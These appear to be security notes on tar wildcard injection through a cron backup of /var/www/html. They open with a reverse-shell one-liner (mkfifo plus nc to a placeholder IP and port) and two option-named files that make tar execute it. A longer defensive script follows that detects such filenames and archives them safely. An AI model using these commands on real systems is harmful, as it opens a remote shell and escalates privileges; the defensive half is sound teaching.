# Wildcard usage
* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
## Another Example
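* A cron job backs up `/var/www/html` via `tar cf backup.tar *`. The shell expands `*` to the filenames in that directory before tar runs, so filenames that look like tar options are parsed as options. The reverse shell script and the option-named files therefore need to be files in this directory to get picked up by tar and executed.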
```sh
echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```
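
The defender's side of the same cron job, as an added example that is not part of the original notes: one function flags option-like filenames in a directory, the other archives it so that such names are stored as data rather than parsed as flags. The function names are hypothetical, the sample directory is constructed, and a `find` that supports `-maxdepth` (GNU or BSD) is assumed.

```sh
#!/bin/sh
# Added example: detect option-like filenames and back up a directory
# without letting tar parse them as options. Function names are hypothetical.

# Print every entry directly inside $1 whose name starts with "-".
# Returns 0 if at least one was found, 1 otherwise.
find_option_like_names() {
    found=$(find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print)
    [ -n "$found" ] || return 1
    printf '%s\n' "$found"
}

# Archive the contents of $1 into $2 (absolute path). The "./" prefix makes
# every expanded name start with "./", and "--" ends option parsing, so a
# file called "--checkpoint=1" is stored as a member instead of read as a flag.
safe_backup() {
    src=$1 out=$2
    ( cd "$src" || exit 1
      set -- ./*
      { [ -e "$1" ] || [ -L "$1" ]; } || exit 1   # empty dir: nothing to do
      tar -cf "$out" -- "$@" )
}

# Constructed demo: a scratch directory with one normal file and one
# option-like name that has no action attached to it.
demo() {
    d=$(mktemp -d) && a=$(mktemp)
    echo data > "$d/index.html"
    touch -- "$d/--checkpoint=1"
    find_option_like_names "$d" >/dev/null &&
        echo "ALERT: option-like filenames in $d"
    safe_backup "$d" "$a" && tar -tf "$a"   # lists both files as members
    rm -rf -- "$d" "$a"
}

demo
```

Running the detection from the backup job itself, before the archive step, gives an alert at the moment someone plants such a file in a writable web root.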